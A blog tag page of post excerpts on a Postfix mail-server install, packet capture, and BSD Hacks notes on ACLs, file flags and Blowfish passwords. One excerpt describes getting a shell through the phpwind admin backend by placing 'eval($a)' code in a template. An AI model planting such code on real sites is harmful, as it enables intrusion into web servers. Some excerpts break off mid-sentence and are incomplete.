Posts Tagged ‘BSD’

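Installation and Configuration Notes for a Mail System Based on Postfix+sasl+courier-imap+courier-authlib+clamav+slockd+amavisd (Part 1)

Posted in FreeBSD, Linux on July 24th, 2009 by 飘(piao2010) – 3 Comments

Please keep the copyright notice when reposting: http://piao2010.com Thank you!
I recently started an internship at a company, and my first task was to set up an internal corporate mail system that must support sending and receiving mail both through a web interface and over SMTP, POP3 and IMAP.
After some Googling to screen the mainstream software, I decided to use the following:
POSTFIX, Courier-imap, Courier-authlib, Cyrus SASL, Maildrop
Webmail: extmail, with extman as the admin backend
Spam filtering and virus protection: Amavisd-new, ClamAV, spamassassin, slockd
Because I had never worked with mail server configuration before and am not very familiar with Linux either (I have always used FreeBSD), this task took a full ten-plus days before I finally got it installed and tested successfully on three virtual machines and then deployed on the server. I tested on CentOS and Fedora; the important software was installed from source, so the steps should largely apply to other platforms.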

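Test address: http://mail.piao2010.com Everyone is welcome to test it!

Reference articles
http://waringid.blog.51cto.com/65148/58412
http://www.extmail.org/docs/extmail_solution_linux/
http://os.51cto.com/art/200710/57530_1.htm
http://www.postfix.org/SASL_README.html
Postfix: The Definitive Guide (《POSTFIX权威指南》), and others
Thanks to the above authors for their hard work.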

 
***************************************************

Starting over from scratch: (2009-7-18)

***************************************************

yum install ntp
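ntpdate 210.72.145.44 && clock -w  # Unrelated step: the virtual machine's clock is always off, so sync the time.

vi /etc/sysconfig/selinux
Disable SELinux
If you do not want to disable it, you can use the following commands instead
setsebool httpd_disable_trans=1
setsebool mysqld_disable_trans=1
iptables settings
Allow ports 25, 110 and 80

Set the hostname
/etc/sysconfig/network
/etc/hosts read more »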

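From Packet Capture to Sniffing

Posted in Before the Move on April 16th, 2009 by 飘(piao2010) – Be the first to comment

This article is my homework for a computer networking course; I am posting it here to fill out the blog.

The first time I came across the term "packet capture" was probably in my first year of high school. I had just become fascinated with network security and often saw articles in 《黑客X档案》 (Hacker X Files) about intrusions that used packet-capture techniques; the most commonly used tool was WsockExpert, read more »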

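Methods for Getting a Shell via the phpwind Admin Backend

Posted in Before the Move on April 11th, 2009 by 飘(piao2010) – Be the first to comment

Method 1: the template method

Log in to the admin backend, go to 风格模版设置 (style template settings), and write the code on any line

Remember, this code must be written flush against the left margin; there must be no characters in front of the code.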

EOT;

eval($a);

print <<

read more »

BSD HACKS Excerpts (Part 3)

Posted in FreeBSD, Before the Move on March 17th, 2009 by 飘(piao2010) – Be the first to comment

Figure 6-1 summarizes the flags, their meanings, and their usual usage. [Hack #58] shows how to create your own file integrity checking program that will alert you if any of your binaries or other important files are changed. An additional layer of protection is to use chflags to prevent those files from being changed in the first place. Usually, the schg

Again, evaluate your particular scenario before implementing this flag. The protection provided by this flag usually far outweighs the inconvenience. The only time the contents of /usr/bin or /usr/sbin should change is when you upgrade the operating system or rebuild your world. Doing that requires a reboot anyway, so dropping to single-user mode to unset schg shouldn’t be a problem.

How often do you change your configuration files in /etc? If you typically configure a system only when it is installed and rarely make changes afterward, protect your configurations with schg. However, keep in mind that a rare configuration change may require you to drop all connections in order to implement it. Also, if you need to add more users to your system, remember to remove that flag from /etc/passwd, /etc/master.passwd, and /etc/group first.

Things are a bit more problematic for a system running installed applications. Most ports install their binaries into /usr/local/bin or /usr/X11R6/bin. If you set the schg flag on those directories, you won’t be able to patch or upgrade those binaries unless you temporarily unset the flag. You’ll have to balance your need to keep your server up and running with the protection you gain from the schg flag and how often you have to patch a particular binary.

6.4.6 Controlling Backups

The last two, arch and nodump, affect backups. The arch flag.

Similarly, when using dump to back up an entire filesystem, the superuser can specify which portions of that filesystem will not be included by setting the nodump flag.

6.4.7 See Also

  • man securelevel

  • man -a chflags (to view all manpages that match chflags, not just the

  • man newsyslog

BSD HACKS Excerpts (Part 2)

Posted in FreeBSD, Before the Move on March 17th, 2009 by 飘(piao2010) – Be the first to comment

ACLs

Edit the superblock with the

# shutdown now
*** FINAL System shutdown message from root@mycompany.com ***
System going down IMMEDIATELY
Dec 11 10:28:07 genisis shutdown: shutdown by root:
System shutdown time has arrived
Writing entropy file:.
Shutting down daemon processes:.
Saving firewall state tables:.
Dec 11 10:28:10 genisis syslogd: exiting on signal 15
Enter full pathname of shell or RETURN for /bin/sh:
#

At the prompt, type:

# /sbin/tunefs -a enable /
# /sbin/tunefs -a enable /usr
# exit

Things [Hack #54] . Don’t reboot yet; you still need to initialize the extended attributes on each file system.

For example, to initialize extended attributes on the /var filesystem, use

# mkdir -p /var/.attribute/system
# cd /var/.attribute/system
# extattrctl initattr -p /var 388 posix1e.acl_access
# extattrctl initattr -p /var 388 posix1e.acl_default

Okay, you’ve successfully enabled ACLs. Now what? Let’s start by viewing ACLs. Looking at ACLs is simple. Files with ACLs will be designated with a + in the long listing provided by ls -l:

% ls -l acl-test
-rw-rw-r--+ 1 rob rob 0 Apr 19 17:27 acl-test

Use the

% getfacl acl-test
#file:acl-test
#owner:1000
#group:1000
user::rw-
user:nobody:rw-
group::r--
group:wheel:rw-
mask::rw-
other::r--

The user::, group::, and other:: fields should all be familiar. They are simply the ACL representations of the standard Unix permissions. The nobody and wheel lines, however, are new. These specify permissions for specific users and groups (in this case, the nobody user and the wheel group) in addition to the normal set of permissions.

The mask field sets maximum permissions, so an r-- mask (set with m::r) in combination with an rw- permission for a user will give the user only r-- permissions on the file.
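The mask rule above, worked through as an added example (not from the original post or the book it excerpts): the hypothetical helper effective_acl parses getfacl-style text and prints each entry's effective permissions. It goes slightly beyond the paragraph by applying the POSIX.1e rule that the mask limits named users, the owning group and named groups, but never the owner or other entries; the sample ACL is constructed from the acl-test listing with the mask set to r--.

```shell
#!/bin/sh
# Added example: effective_acl is a hypothetical helper, not a system utility.
# Constructed sample: the acl-test ACL from the text with the mask set to r--.
SAMPLE_ACL='#file:acl-test
#owner:1000
#group:1000
user::rw-
user:nobody:rw-
group::r--
group:wheel:rw-
mask::r--
other::r--'

# Reads getfacl-style text on stdin, prints "tag:qualifier:effective-perms".
effective_acl() {
    awk -F: '
        BEGIN { n = 0; mask = "" }
        /^#/ || NF < 3 { next }                 # header comments, blank lines
        $1 == "mask" { mask = substr($3, 1, 3); next }
        { tag[n] = $1; who[n] = $2; perm[n] = substr($3, 1, 3); n++ }
        END {
            for (i = 0; i < n; i++) {
                p = perm[i]
                # The mask caps named users, the owning group and named groups;
                # the owner (user::) and other:: entries are never masked.
                masked = (tag[i] == "group" || (tag[i] == "user" && who[i] != ""))
                if (masked && mask != "") {
                    e = ""
                    for (k = 1; k <= 3; k++) {
                        c = substr(p, k, 1)
                        if (substr(mask, k, 1) != c) c = "-"
                        e = e c
                    }
                    p = e
                }
                print tag[i] ":" who[i] ":" p
            }
        }'
}

printf '%s\n' "$SAMPLE_ACL" | effective_acl
```

With the r-- mask, nobody and wheel drop from rw- to r-- while the owner keeps rw-, which is why a restrictive mask is a quick way to cap every named entry on a file at once.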

 

The chmod, only the file’s owner or the superuser can use this command. You only need to use a few of its options to start manipulating ACLs.

First, a word on syntax. ACLs are specified just as they’re printed by getfacl. Let’s remove and reconstruct the ACL for acl-test:

% setfacl -b acl-test
% setfacl -m user:nobody:rw-,group:wheel:rw- acl-test

The -b option removes all ACLs, except for the standard user, group, and other lines. The -m option modifies the ACL with the specified entry (or comma-separated entries). Entries may also be abbreviated: the code here could have been shortened to u:nobody:rw-,g:wheel:rw-.

You can even use setfacl to modify traditional permissions; setting a user::rw- ACL entry is equivalent to running chmod u=rw on a file.

Removing ACLs is almost identical: setfacl -x u:nobody:rw-,g:wheel:rw- removes that ACL. You can also specify ACLs in files. The -M and -X options perform the functions of their lowercase relatives, but read their entries from a file. Consider the acl-test file again:

% cat test-acl-list
u:nobody:rw-
# this is a comment
g:wheel:rw-
% setfacl -X test-acl-list acl-test
% getfacl acl-test
#file:acl-test
#owner:1000
#group:1000
user::rw-
group::r--
mask::r--
other::r--

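BSD HACKS Excerpts (Part 1)

Posted in FreeBSD, Before the Move on March 17th, 2009 by 飘(piao2010) – Be the first to comment

I could not find a Chinese edition to download online, so I will just take notes from the English edition.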

 

Let’s start with the copyright information. That’s this part of the default login process:

Copyright (c) 1992-2003 The FreeBSD Project.

Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994

The Regents of the University of California. All rights reserved.

To prevent users from seeing this information, simply:

# touch /etc/COPYRIGHT

Technically, you could add your own information to /etc/COPYRIGHT instead of leaving it as an empty file. However, it is common practice to put your information in /etc/motd instead. The default /etc/motd contains very useful information to the new user, but it does get rather old after a few hundred logins.

You can edit /etc/motd to say whatever suits your purposes—anything from your favorite sci-fi excerpt to all the nasty things that will happen to someone if they continue to try to log into your system. Here’s a very simple example:

# more /etc/motd

*********************************************************

*****            Authorized users only!!            *****

*********************************************************

You’ll note that after you customize your motd, users will still see this text prepended to it:

FreeBSD 5.1-RELEASE (GENERIC) #0: Thu Jun 5 02:55:42 GMT 2003

If you don’t want to advertise your operating system version and kernel information, you’ll need one more hack. Add this line to /etc/rc.conf:

update_motd="NO"

If you’re using FreeBSD 5.x, you no longer have to reboot or go into single-user mode to initialize a change to /etc/rc.conf. Instead, you can use one of the many scripts available in /etc/rc.d. Let’s see if there’s a script that deals with motd:

# ls -F /etc/rc.d | grep motd

motd*

Excellent. Let’s see what syntax that command expects:

# /etc/rc.d/motd

Usage: /etc/rc.d/motd [fast|force](start|stop|restart|rcvar)

Parameters in square brackets are optional, whereas parameters in parentheses are mandatory. Notice each option is separated by the or symbol (|), meaning you just pick one out of the list.

In our case, we want to use the rcvar parameter. This will tell the motd script to reread its setting in /etc/rc.conf:

# /etc/rc.d/motd rcvar

# motd

$update_motd=NO

To use Blowfish, start by opening up /etc/login.conf in your favorite editor. Look for this line:

:passwd_format=md5:\

Carefully edit it so it looks like this:

:passwd_format=blf:\

Check for typos before saving your change.

You may have noticed this comment when you modified /etc/login.conf:

# Remember to rebuild the database after each change to this file:

#

#        cap_mkdb /etc/login.conf

#

Let’s take a closer look at what we’re being asked to do. According to that comment, login.conf is more than a configuration file, it is a database. Not only that, it is a capability database, a database that supports different capabilities. That is the reason behind the weird syntax within login.conf. Whenever you edit a capability database, you have to use the cap_mkdb command to integrate your changes within the database.

So, follow the directions:

# cap_mkdb /etc/login.conf

If you have any existing users, you need to convert their passwords from MD5 to Blowfish. This is why it’s a good idea to make the change before you create your users.

If you’ve already created users, it’s back to the password database to find all of the active accounts. Inactive accounts—accounts that don’t allow logins—have the * character instead of an encrypted password. Since we want to find all of the lines in the password database that do not contain an asterisk, we need an inverted grep:

# grep -v '*' /etc/master.passwd

root:$1$ywXbyPT/$GC8tXN91c.lsKRpLZori61:0:0::0:0:Charlie &:/root:/bin/csh

dru:$1$GFm1nh6I$jh3v4I.QNf450ARgltZU5.:1008:0::0:0:User &:/home/dru:/bin/csh

Well, that worked, but we could make the output look much prettier:

# grep -v '*' /etc/master.passwd | cut -d ':' -f 1

root

dru

Let’s pick apart that command syntax. grep -v creates a reverse filter. In effect, it says, “Show me the lines in /etc/master.passwd that do not contain an *.” Since those lines are long and contain much more than just the username, I piped the output to the cut utility to literally cut out the portions I don’t need to see. Notice that the usernames are the very first thing in each line, and they are always followed by the : field separator. -d tells cut to consider the colon character, not the tab character, as the separator. -f 1 tells cut that I’m interested in the very first field of that line.

It looks like my particular system has two active accounts: root and dru. Notice in the original output the long sequence of characters that starts with $1 and ends with :. No, my users’ passwords aren’t quite that complex. Rather, you’re seeing the password after it’s been encrypted by the MD5 algorithm. That $1 means MD5. It’ll be $2 after we switch to Blowfish encryption. (Be aware that you can’t edit the file directly; the entire password must be changed.)

I’ll now change those two passwords:

# passwd dru

Changing local password for dru

New Password:

Retype New Password:

 

# passwd

Changing local password for root

New Password:

Retype New Password:

Note that the superuser can change any user’s password by specifying the appropriate username. If you don’t specify a name, you will instead change the root password.

When you’re finished, repeat the original grep -v command and double-check that all of the encrypted passwords now start with $2.
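
The final double-check can be scripted; the following is an added example, not code from the original post or the book it excerpts. The helper names hash_audit and needs_rehash and the sample entries are assumptions, and unlike grep -v '*' it tests only the password field and also reports accounts with an empty password.

```shell
#!/bin/sh
# Added example: hash_audit and needs_rehash are hypothetical helper names.
# Constructed sample in master.passwd format; the hash strings are placeholders.
SAMPLE_PASSWD='root:$1$SALTSALT$PLACEHOLDERHASHAAAAAAA:0:0::0:0:Charlie &:/root:/bin/csh
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
dru:$2a$04$PLACEHOLDERSALTANDHASHBBBBBBBBBBBBBBBBBBBB:1008:0::0:0:User &:/home/dru:/bin/csh
rob:$1$SALTSALT$PLACEHOLDERHASHCCCCCCC:1000:1000::0:0:User &:/home/rob:/bin/csh
guest::1001:1001::0:0:Guest:/home/guest:/bin/sh'

# Reads master.passwd-format text on stdin; prints "user:scheme" for every
# account whose password field does not start with * (the inactive marker).
hash_audit() {
    awk -F: '
        /^#/ || NF < 2   { next }              # comments and blank lines
        $2 ~ /^\*/       { next }              # inactive account, no login
        $2 == ""         { print $1 ":empty"; next }
        $2 ~ /^\$1\$/    { print $1 ":md5";   next }
        $2 ~ /^\$2/      { print $1 ":blf";   next }
                         { print $1 ":other" }'
}

# Lists only the accounts that still need a password change to get a $2 hash.
needs_rehash() {
    hash_audit | awk -F: '$2 != "blf" { print $1 }'
}

printf '%s\n' "$SAMPLE_PASSWD" | needs_rehash
```

On a live system, run it as root with needs_rehash < /etc/master.passwd; an empty result means every active account already has a $2 hash.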

Finally, configure the adduser utility to use Blowfish whenever you create a new user by editing /etc/auth.conf. Look for this line:

# crypt_default = md5 des

and carefully change it to:

crypt_default = blf

Once you’ve saved your change, test it by creating a new user. The easiest way to do this is to type adduser and follow the prompts.